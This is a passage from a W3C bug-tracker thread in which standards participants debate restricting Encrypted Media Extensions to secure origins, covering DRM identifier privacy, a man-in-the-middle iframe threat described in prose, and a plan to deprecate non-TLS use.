> ...node locking would still be accomplished thanks to #1, but tracking
> across sites would be prevented and the user would have the opportunity to
> cause a discontinuity in tracking on a particular site.

Please file a bug to add normative text around identifiers. If it includes proposed text, even better.

> If the spec further required the key system to encrypt messages such that
> the identifier is only visible to the key server, in terms of the id
> exposure, the result would be close (equivalent even?) to the https case (as
> currently written without the requirement for the whole browsing context
> path to the top-level to be https-only) as far as the threat of a key
> server-operating active MITM who injects EME-using iframes that connect to
> the MITM-operated key server goes.

You could file a bug for this too. I'm not sure what the normative text would look like.

> P.S. Regarding cookie equivalence: If cookies were designed today, they'd be
> at minimum origin-scoped and possible https-only. Arguing mere cookie
> equilavence risks falling into the pattern that DJB characterizes as arguing
> against encrypting SNI because DNS traffic is unencrypted and arguing
> against encrypting DNS traffic because SNI is unencrypted.

For reference: Similar points about cookies has also been made in comment #47 and http://lists.w3.org/Archives/Public/www-tag/2014Oct/0082.html.


(In reply to Henri Sivonen from comment #126)

> I think exposing a permanent or origin-independent identifier to the other
> end of the TLS pipe would be a problem still, so I still think Mozilla-style
> partitioning of the CDM identity should be recommended even with https.

I agree that this is still a problem we need to address. See above.

> I think an https goal should not be allowed as an excuse not to
> recommend how equivalent or almost equivalent privacy properties could be
> achieved on the Key System layer.

I don't think anyone has argued that. Authenticated origins provide important security and privacy properties, some of which cannot be obtained in other ways, but the security and privacy concerns are extensive (as demonstrated by the current considerations sections) and will require other solutions as well. If you have specific concerns and/or solutions, please file bugs.
Comment 128 David Dorwin 2014-10-30 17:07:48 UTC
(In reply to Anne from comment #125)
> Here's a proposal.
Thanks for makig a proposal!
> 
> 1) We work out how to make non-TLS EME as good as possible for end users and
> if UAs opt to support non-TLS (as everyone does at this point) they steer
> towards implementing those requirements.
> 
> 2) We deprecate non-TLS EME in the specification and recommend against
> supporting it.
> 
> 3) We set a date one or two years from now at a point when at least two UAs
> are willing to disable non-TLS EME.
> 
> 4) We advertize this date through console warnings, evangelism, and perhaps
> even the specification.
> 
> This plan is similar to what has been proposed for WebRTC and geolocation
> and seems reasonable given existing non-TLS deployment.

I like this proposal in general. It gives content providers time to adapt, includes a normative requirement, informs authors about the upcoming change, and (somewhat) addresses the competitive disadvantage concern.

> (We also make sure to not fall in this non-TLS trap again for new APIs.)

Agreed. Maybe evaluating whether TLS is required should be added to the FPWD process.
Comment 129 Anne 2014-10-30 17:19:20 UTC
(In reply to David Dorwin from comment #128)
> Agreed. Maybe evaluating whether TLS is required should be added to the FPWD
> process.

http://lists.w3.org/Archives/Public/public-w3process/2014Oct/0191.html
Comment 130 Mark Watson 2014-10-31 02:47:45 UTC
I discussed the spec change with David and we agreed to change the text for the moment so that it is clear the behavior on unauthenticated origins is an open issue. The procedures still describe the check for an unauthenticated origin, but the subsequent behaviour is noted as open with a reference to this bug.

There is no disagreement that there is a problem to be solved here. The disagreement is about the solution and it requires continued discussion.
Comment 131 Boris Zbarsky 2014-10-31 19:39:32 UTC
Comment 125 seems like a reasonable path forward to me, with UAs coordinating the flag day.
Comment 132 Henri Sivonen 2014-11-07 12:32:19 UTC
(In reply to David Dorwin from comment #127)
> (In reply to Henri Sivonen from comment #123)

> Anne's proposal in comment #125 seems like a reasonable approach to avoid
> this.

Yes.

> > Also, restricting EME to https origins the way Chrome has restricted Web
> > Crypto to https origins—i.e. requiring the origin that calls the API to be
> > an https origin—is not good enough to address the concerns that Ryan raises
> > in https://twitter.com/sleevi_/status/526586427656507394 and in
> > https://www.w3.org/Bugs/Public/show_bug.cgi?id=26332#c114 . The MITM would
> > inject an https iframe into http pages such that the https iframe loads from
> > a MITM-controlled server that has a legitimately obtained certificate and
> > serves a JS app to talk with a MITM-controlled key server that sees the
> > identifier exposed by the key system. To make the DRM identifiers
> > unavailable to an active MITM (unless the MITM forges certificates), the
> > https-only restriction must apply to all origins in the whole chain of
> > browsing context from the browsing context using EME to the top-level
> > browsing context. In other words,
> > https://dvcs.w3.org/hg/html-media/rev/896eb33b68a2 does not actually address
> > the threats that Ryan has brought forward.
> 
> Do you have a proposal for how to modify the existing text to address this
> concern?

Bug 27271.

> Please file a bug to add normative text around identifiers. If it includes
> proposed text, even better.

Definition: bug 27268
Partitioning: bug 27269
Forgettability: bug 27270

> > If the spec further required the key system to encrypt messages such that
> > the identifier is only visible to the key server, in terms of the id
> > exposure, the result would be close (equivalent even?) to the https case (as
> > currently written without the requirement for the whole browsing context
> > path to the top-level to be https-only) as far as the threat of a key
> > server-operating active MITM who injects EME-using iframes that connect to
> > the MITM-operated key server goes.
> 
> You could file a bug for this too. I'm not sure what the normative text
> would look like.

Bug 27272.
Comment 133 David Dorwin 2014-11-18 01:36:34 UTC
https://github.com/w3c/encrypted-media/commit/c937df6a02c57f2e0fb5f9fd683295d26f83c409 updates the existing step to reflect the current Mixed Content WD, which replaced "authenticated origin" with an algorithm.
Comment 134 David Dorwin 2015-04-18 00:40:06 UTC
https://github.com/w3c/encrypted-media/commit/5d38999268fa580f8fdb4ffcac2cb88ba3b83a8d implements the text agreed upon [1] at the f2f.

Mark will file GitHub issues to address items #2 and #3 from his third slide [2].

GitHub issue 49 [3] tracks updating the existing text to reference the new Privileged Contexts definition, which replaces the powerful features algorithm currently referenced.


[1] http://www.w3.org/2015/04/16-html-media-minutes.html#item03
[2] https://docs.google.com/presentation/d/18uM0Cijk_MI3op8VAa6MM6LIWtQGJ5WXjTHPmqyLa5g/view#slide=id.g76d7a3737_0_51
[3] https://github.com/w3c/encrypted-media/issues/49